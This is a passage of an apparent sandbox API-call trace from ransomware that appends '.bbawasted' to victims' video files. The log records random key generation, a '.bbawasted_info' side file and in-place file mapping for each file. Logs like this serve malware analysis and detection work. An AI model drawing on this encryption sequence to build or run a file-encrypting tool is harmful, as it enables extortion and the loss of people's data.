flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xfc [0076.492] CryptAcquireContextW (in: phProv=0x119fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fe84*=0x5a4020) returned 1 [0076.492] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x1b8, pbBuffer=0x5d29d8 | out: pbBuffer=0x5d29d8) returned 1 [0076.493] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0076.493] CryptAcquireContextW (in: phProv=0x119fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fbec*=0x5a4020) returned 1 [0076.493] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x200, pbBuffer=0x119fc08 | out: pbBuffer=0x119fc08) returned 1 [0076.493] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0076.501] SetEndOfFile (hFile=0x120) returned 1 [0076.503] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5b8940 | out: hHeap=0x580000) returned 1 [0076.504] CloseHandle (hObject=0x120) returned 1 [0076.505] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5d0700 | out: hHeap=0x580000) returned 1 [0076.505] CryptAcquireContextW (in: phProv=0x119fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fecc*=0x5a4020) returned 1 [0076.506] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0x119ff08 | out: pbBuffer=0x119ff08) returned 1 [0076.506] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0076.506] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\IhTU2EBP 19fiU9dnUl.avi") returned 64 [0076.506] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x28a) returned 0x5d2990 [0076.506] lstrcpyW (in: lpString1=0x5d2a10, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0076.506] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5b8940 [0076.506] CryptAcquireContextW (in: phProv=0x119fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fea8*=0x5a4020) returned 1 [0076.507] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5b8940 | out: pbBuffer=0x5b8940) returned 1 [0076.507] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0076.507] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\IhTU2EBP 19fiU9dnUl.avi.bbawasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ihtu2ebp 19fiu9dnul.avi.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0076.507] WriteFile (in: hFile=0x120, lpBuffer=0x5b8940*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x119fec4, lpOverlapped=0x0 | out: lpBuffer=0x5b8940*, lpNumberOfBytesWritten=0x119fec4*=0xa3a, lpOverlapped=0x0) returned 1 [0076.508] SetEndOfFile (hFile=0x120) returned 1 [0076.509] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0076.509] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5b8940 | out: hHeap=0x580000) returned 1 [0076.509] lstrcpyW (in: lpString1=0x5d2a10, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0076.509] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\IhTU2EBP 19fiU9dnUl.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ihtu2ebp 19fiu9dnul.avi"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\IhTU2EBP 19fiU9dnUl.avi.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ihtu2ebp 19fiu9dnul.avi.bbawasted")) returned 1 [0076.509] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\IhTU2EBP 19fiU9dnUl.avi.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ihtu2ebp 19fiu9dnul.avi.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xfc [0076.509] CreateFileMappingW (hFile=0xfc, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xf8 [0076.512] CryptAcquireContextW (in: phProv=0x119fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fe84*=0x5d0908) returned 1 [0076.513] CryptGenRandom (in: hProv=0x5d0908, dwLen=0x1b8, pbBuffer=0x5d0748 | out: pbBuffer=0x5d0748) returned 1 [0076.513] CryptReleaseContext (hProv=0x5d0908, dwFlags=0x0) returned 1 [0076.513] CryptAcquireContextW (in: phProv=0x119fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fbec*=0x5d0908) returned 1 [0076.513] CryptGenRandom (in: hProv=0x5d0908, dwLen=0x200, pbBuffer=0x119fc08 | out: pbBuffer=0x119fc08) returned 1 [0076.513] CryptReleaseContext (hProv=0x5d0908, dwFlags=0x0) returned 1 [0076.522] SetEndOfFile (hFile=0x120) returned 1 [0076.524] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5b8940 | out: hHeap=0x580000) returned 1 [0076.524] CloseHandle (hObject=0x120) returned 1 [0076.525] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5d2990 | out: hHeap=0x580000) returned 1 [0076.525] CryptAcquireContextW (in: phProv=0x119fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fecc*=0x5a4020) returned 1 [0076.526] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0x119ff08 | out: pbBuffer=0x119ff08) returned 1 [0076.526] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0076.526] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ISSXQFQ.avi") returned 52 [0076.526] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x272) returned 0x5d0700 [0076.526] lstrcpyW (in: lpString1=0x5d0768, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0076.526] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5b8940 [0076.526] CryptAcquireContextW (in: phProv=0x119fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fea8*=0x5a4020) returned 1 [0076.527] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5b8940 | out: pbBuffer=0x5b8940) returned 1 [0076.527] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0076.527] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ISSXQFQ.avi.bbawasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\issxqfq.avi.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0076.528] WriteFile (in: hFile=0x120, lpBuffer=0x5b8940*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x119fec4, lpOverlapped=0x0 | out: lpBuffer=0x5b8940*, lpNumberOfBytesWritten=0x119fec4*=0xa3a, lpOverlapped=0x0) returned 1 [0076.529] SetEndOfFile (hFile=0x120) returned 1 [0076.529] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0076.529] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5b8940 | out: hHeap=0x580000) returned 1 [0076.529] lstrcpyW (in: lpString1=0x5d0768, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0076.529] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ISSXQFQ.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\issxqfq.avi"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ISSXQFQ.avi.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\issxqfq.avi.bbawasted")) returned 1 [0076.529] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ISSXQFQ.avi.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\issxqfq.avi.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf8 [0076.530] CreateFileMappingW (hFile=0xf8, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xfc [0076.532] CryptAcquireContextW (in: phProv=0x119fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fe84*=0x5a4020) returned 1 [0076.533] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x1b8, pbBuffer=0x5d29d8 | out: pbBuffer=0x5d29d8) returned 1 [0076.533] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0076.533] CryptAcquireContextW (in: phProv=0x119fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fbec*=0x5a4020) returned 1 [0076.533] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x200, pbBuffer=0x119fc08 | out: pbBuffer=0x119fc08) returned 1 [0076.533] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0076.578] SetEndOfFile (hFile=0x120) returned 1 [0076.580] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5b8940 | out: hHeap=0x580000) returned 1 [0076.580] CloseHandle (hObject=0x120) returned 1 [0076.582] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5d0700 | out: hHeap=0x580000) returned 1 [0076.582] CryptAcquireContextW (in: phProv=0x119fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fecc*=0x5a4020) returned 1 [0076.583] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0x119ff08 | out: pbBuffer=0x119ff08) returned 1 [0076.583] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0076.583] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\JL2CgQ 7.swf") returned 53 [0076.583] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x274) returned 0x5d0700 [0076.583] lstrcpyW (in: lpString1=0x5d076a, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0076.583] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5b8940 [0076.583] CryptAcquireContextW (in: phProv=0x119fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fea8*=0x5a4020) returned 1 [0076.584] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5b8940 | out: pbBuffer=0x5b8940) returned 1 [0076.584] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0076.584] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\JL2CgQ 7.swf.bbawasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\jl2cgq 7.swf.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0076.584] WriteFile (in: hFile=0x120, lpBuffer=0x5b8940*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x119fec4, lpOverlapped=0x0 | out: lpBuffer=0x5b8940*, lpNumberOfBytesWritten=0x119fec4*=0xa3a, lpOverlapped=0x0) returned 1 [0076.585] SetEndOfFile (hFile=0x120) returned 1 [0076.585] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0076.586] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5b8940 | out: hHeap=0x580000) returned 1 [0076.586] lstrcpyW (in: lpString1=0x5d076a, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0076.586] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\JL2CgQ 7.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\jl2cgq 7.swf"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\JL2CgQ 7.swf.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\jl2cgq 7.swf.bbawasted")) returned 1 [0076.586] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\JL2CgQ 7.swf.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\jl2cgq 7.swf.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf8 [0076.586] CreateFileMappingW (hFile=0xf8, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xfc [0076.589] CryptAcquireContextW (in: phProv=0x119fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fe84*=0x5a4020) returned 1 [0076.590] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x1b8, pbBuffer=0x5dd658 | out: pbBuffer=0x5dd658) returned 1 [0076.590] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0076.590] CryptAcquireContextW (in: phProv=0x119fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fbec*=0x5a4020) returned 1 [0076.590] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x200, pbBuffer=0x119fc08 | out: pbBuffer=0x119fc08) returned 1 [0076.590] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0076.599] SetEndOfFile (hFile=0x120) returned 1 [0076.601] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5b8940 | out: hHeap=0x580000) returned 1 [0076.601] CloseHandle (hObject=0x120) returned 1 [0076.602] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5d0700 | out: hHeap=0x580000) returned 1 [0076.602] CryptAcquireContextW (in: phProv=0x119fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fecc*=0x5a4020) returned 1 [0076.603] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0x119ff08 | out: pbBuffer=0x119ff08) returned 1 [0076.603] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0076.603] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\MRjm87Q6Vyok.mp4") returned 57 [0076.603] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x27c) returned 0x5d0700 [0076.603] lstrcpyW (in: lpString1=0x5d0772, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0076.603] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5b8940 [0076.603] CryptAcquireContextW (in: phProv=0x119fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fea8*=0x5a4020) returned 1 [0076.604] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5b8940 | out: pbBuffer=0x5b8940) returned 1 [0076.604] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0076.604] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\MRjm87Q6Vyok.mp4.bbawasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\mrjm87q6vyok.mp4.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0076.605] WriteFile (in: hFile=0x120, lpBuffer=0x5b8940*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x119fec4, lpOverlapped=0x0 | out: lpBuffer=0x5b8940*, lpNumberOfBytesWritten=0x119fec4*=0xa3a, lpOverlapped=0x0) returned 1 [0076.606] SetEndOfFile (hFile=0x120) returned 1 [0076.606] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0076.606] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5b8940 | out: hHeap=0x580000) returned 1 [0076.606] lstrcpyW (in: lpString1=0x5d0772, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0076.606] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\MRjm87Q6Vyok.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\mrjm87q6vyok.mp4"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\MRjm87Q6Vyok.mp4.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\mrjm87q6vyok.mp4.bbawasted")) returned 1 [0076.606] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\MRjm87Q6Vyok.mp4.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\mrjm87q6vyok.mp4.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xfc [0076.607] CreateFileMappingW (hFile=0xfc, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xf8 [0076.608] CryptAcquireContextW (in: phProv=0x119fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fe84*=0x5a4020) returned 1 [0076.609] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x1b8, pbBuffer=0x5dd658 | out: pbBuffer=0x5dd658) returned 1 [0076.609] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0076.609] CryptAcquireContextW (in: phProv=0x119fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fbec*=0x5a4020) returned 1 [0076.610] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x200, pbBuffer=0x119fc08 | out: pbBuffer=0x119fc08) returned 1 [0076.610] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0076.664] SetEndOfFile (hFile=0x120) returned 1 [0076.666] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c6ff0 | out: hHeap=0x580000) returned 1 [0076.666] CloseHandle (hObject=0x120) returned 1 [0076.667] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5d0700 | out: hHeap=0x580000) returned 1 [0076.667] CryptAcquireContextW (in: phProv=0x119fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fecc*=0x5a4020) returned 1 [0076.668] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0x119ff08 | out: pbBuffer=0x119ff08) returned 1 [0076.668] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0076.668] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\uJa-t0 nFe3Xb8_rsN8Q\\7B5L KgwbxO.mkv") returned 77 [0076.668] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x2a4) returned 0x5d2990 [0076.669] lstrcpyW (in: lpString1=0x5d2a2a, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0076.669] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5c6ff0 [0076.669] CryptAcquireContextW (in: phProv=0x119fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fea8*=0x5a4020) returned 1 [0076.670] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5c6ff0 | out: pbBuffer=0x5c6ff0) returned 1 [0076.670] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0076.670] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\uJa-t0 nFe3Xb8_rsN8Q\\7B5L KgwbxO.mkv.bbawasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\uja-t0 nfe3xb8_rsn8q\\7b5l kgwbxo.mkv.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0076.721] WriteFile (in: hFile=0x120, lpBuffer=0x5c6ff0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x119fec4, lpOverlapped=0x0 | out: lpBuffer=0x5c6ff0*, lpNumberOfBytesWritten=0x119fec4*=0xa3a, lpOverlapped=0x0) returned 1 [0076.723] SetEndOfFile (hFile=0x120) returned 1 [0076.723] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0076.723] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c6ff0 | out: hHeap=0x580000) returned 1 [0076.723] lstrcpyW (in: lpString1=0x5d2a2a, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0076.723] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\uJa-t0 nFe3Xb8_rsN8Q\\7B5L KgwbxO.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\uja-t0 nfe3xb8_rsn8q\\7b5l kgwbxo.mkv"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\uJa-t0 nFe3Xb8_rsN8Q\\7B5L KgwbxO.mkv.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\uja-t0 nfe3xb8_rsn8q\\7b5l kgwbxo.mkv.bbawasted")) returned 1 [0076.724] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\uJa-t0 nFe3Xb8_rsN8Q\\7B5L KgwbxO.mkv.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\uja-t0 nfe3xb8_rsn8q\\7b5l kgwbxo.mkv.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xfc [0076.724] CreateFileMappingW (hFile=0xfc, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x110 [0076.725] CryptAcquireContextW (in: phProv=0x119fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fe84*=0x5a4020) returned 1 [0076.726] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x1b8, pbBuffer=0x5dd658 | out: pbBuffer=0x5dd658) returned 1 [0076.727] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0076.727] CryptAcquireContextW (in: phProv=0x119fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fbec*=0x5a4020) returned 1 [0076.727] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x200, pbBuffer=0x119fc08 | out: pbBuffer=0x119fc08) returned 1 [0076.728] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0076.738] SetEndOfFile (hFile=0x120) returned 1 [0076.741] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c6ff0 | out: hHeap=0x580000) returned 1 [0076.741] CloseHandle (hObject=0x120) returned 1 [0076.743] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5d2990 | out: hHeap=0x580000) returned 1 [0076.743] CryptAcquireContextW (in: phProv=0x119fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fecc*=0x5a4020) returned 1 [0076.744] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0x119ff08 | out: pbBuffer=0x119ff08) returned 1 [0076.744] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0076.744] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\uJa-t0 nFe3Xb8_rsN8Q\\7XCQwS-MjphY97-F.mkv") returned 82 [0076.744] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x2ae) returned 0x5d2990 [0076.744] lstrcpyW (in: lpString1=0x5d2a34, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0076.744] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5c6ff0 [0076.744] CryptAcquireContextW (in: phProv=0x119fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fea8*=0x5a4020) returned 1 [0076.745] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5c6ff0 | out: pbBuffer=0x5c6ff0) returned 1 [0076.745] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0076.745] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\uJa-t0 nFe3Xb8_rsN8Q\\7XCQwS-MjphY97-F.mkv.bbawasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\uja-t0 nfe3xb8_rsn8q\\7xcqws-mjphy97-f.mkv.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0076.746] WriteFile (in: hFile=0x120, lpBuffer=0x5c6ff0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x119fec4, lpOverlapped=0x0 | out: lpBuffer=0x5c6ff0*, lpNumberOfBytesWritten=0x119fec4*=0xa3a, lpOverlapped=0x0) returned 1 [0076.747] SetEndOfFile (hFile=0x120) returned 1 [0076.747] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0076.747] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c6ff0 | out: hHeap=0x580000) returned 1 [0076.747] lstrcpyW (in: lpString1=0x5d2a34, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0076.747] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 